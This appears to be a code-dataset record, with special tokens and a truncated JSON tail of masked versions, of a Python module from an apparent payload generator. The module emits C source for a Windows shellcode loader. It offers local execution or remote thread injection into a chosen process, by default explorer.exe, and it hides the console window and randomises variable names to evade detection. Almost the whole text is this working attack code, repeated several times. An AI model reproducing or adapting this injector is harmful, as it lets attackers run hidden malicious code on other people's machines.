Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = ('};\nHWND ' + Hide_Window +
' = GetConsoleWindow();')
Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'
return Hide_Window_Console_Code
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = ('};\nHWND ' + Hide_Window +
' = GetConsoleWindow();')
Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'
return Hide_Window_Console_Code
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
from lib import gen, core
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = ('};\nHWND ' + Hide_Window +
' = GetConsoleWindow();')
Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'
return Hide_Window_Console_Code
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'
return Remote_Thread_Injection
<|reserved_special_token_1|>
from lib import gen, core
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = "#include <windows.h>\n"
Start_Code += "#include <tlhelp32.h>\n"
Start_Code += "#include <stdio.h>\n"
Start_Code += "#include <stdlib.h>\n"
Start_Code += "#include <string.h>\n"
Start_Code += "int main(int argc, char **argv) {"
Start_Code += "char " + Shellcode + "[] = {"
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = "};\nHWND " + Hide_Window + " = GetConsoleWindow();"
Hide_Window_Console_Code += "ShowWindow(" + Hide_Window + ", SW_HIDE);"
return Hide_Window_Console_Code
def Local_Or_Remote():
print("""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
""")
Choice = core.core_input()
if Choice == "1":
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == "2":
print("""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
""")
ProcessName = core.core_input()
if ProcessName != "":
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = "explorer.exe"
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = "void *" + Exec + " = VirtualAlloc(0, sizeof " + Shellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);"
Local_Thread_Injection += "memcpy(" + Exec + ", " + Shellcode + ", sizeof " + Shellcode + ");"
Local_Thread_Injection += "((void(*)())" + Exec + ")();}"
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = "PROCESSENTRY32 " + Entry + ";"
Remote_Thread_Injection += Entry + ".dwSize = sizeof(PROCESSENTRY32);"
Remote_Thread_Injection += "HANDLE " + Snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);"
Remote_Thread_Injection += "if (Process32First(" + Snapshot + ", &" + Entry + ") == TRUE){"
Remote_Thread_Injection += "while (Process32Next(" + Snapshot + ", &" + Entry + ") == TRUE){"
Remote_Thread_Injection += 'if (stricmp(' + Entry + '.szExeFile, ' + '"' + ProcessName + '"' + ') == 0){'
Remote_Thread_Injection += "HANDLE " + Process_Handle + ";"
Remote_Thread_Injection += "HANDLE " + Remote_Thread + ";"
Remote_Thread_Injection += "PVOID " + Remote_Buffer + ";"
Remote_Thread_Injection += Process_Handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Entry + ".th32ProcessID);"
Remote_Thread_Injection += Remote_Buffer + " = VirtualAllocEx(" + Process_Handle + ", NULL, sizeof " + Shellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);"
Remote_Thread_Injection += "WriteProcessMemory(" + Process_Handle + ", " + Remote_Buffer + ", " + Shellcode + ", sizeof " + Shellcode + ", NULL);"
Remote_Thread_Injection += Remote_Thread + " = CreateRemoteThread(" + Process_Handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + Remote_Buffer + ", NULL, 0, NULL);"
Remote_Thread_Injection += "CloseHandle(" + Process_Handle + ");}}}"
Remote_Thread_Injection += "CloseHandle(" + Snapshot + ");}"
return Remote_Thread_Injection
|
flexible
|
{
"blob_id": "e9b9f87a18a5788ac86b1e85c0f3d7858946e03a",
"index": 2999,
"step-1": "<mask token>\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\n<mask token>\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? (DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-2": "<mask token>\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = ('};\\nHWND ' + Hide_Window +\n ' = GetConsoleWindow();')\n Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'\n return Hide_Window_Console_Code\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? (DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-3": "<mask token>\nShellcode = gen.Varname_Creator()\nHide_Window = gen.Varname_Creator()\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = ('};\\nHWND ' + Hide_Window +\n ' = GetConsoleWindow();')\n Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'\n return Hide_Window_Console_Code\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? (DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-4": "from lib import gen, core\nShellcode = gen.Varname_Creator()\nHide_Window = gen.Varname_Creator()\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = ('};\\nHWND ' + Hide_Window +\n ' = GetConsoleWindow();')\n Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'\n return Hide_Window_Console_Code\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? (DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + 